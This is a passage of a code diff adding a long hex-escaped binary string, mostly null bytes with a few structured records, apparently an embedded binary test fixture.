+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x54\x76\xF8\x4E\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xF5\xF5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFC\x9A\x15\xD2\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\xF5\xF4\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA8\xEC\xED\x9C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0C\x1C\xE0\x75\x19\xCB\xF5\xA2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x65\x65\xBC\xC2\xD9\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\xF4\x52\xA1\xD1\x08\xCD\x5D\x4E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x90\x48\xC1\xD8\x12".
+	        "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE7\xD8\x48\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\xF7\xF5".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x34\x75\xD8\x3D\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\xF5\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD3\xAD\x90\xDD".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9E\x3E".
+	        "\x43\xF9\x38\xAC\xE5\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCA\x65\x65\xC2\xAF\xE6\x00\x43\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD6\xDE\x7C\x1C\x9C\x04\x36\xC6\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3D\x90\x90\xC1\xAD\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x03\x01".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
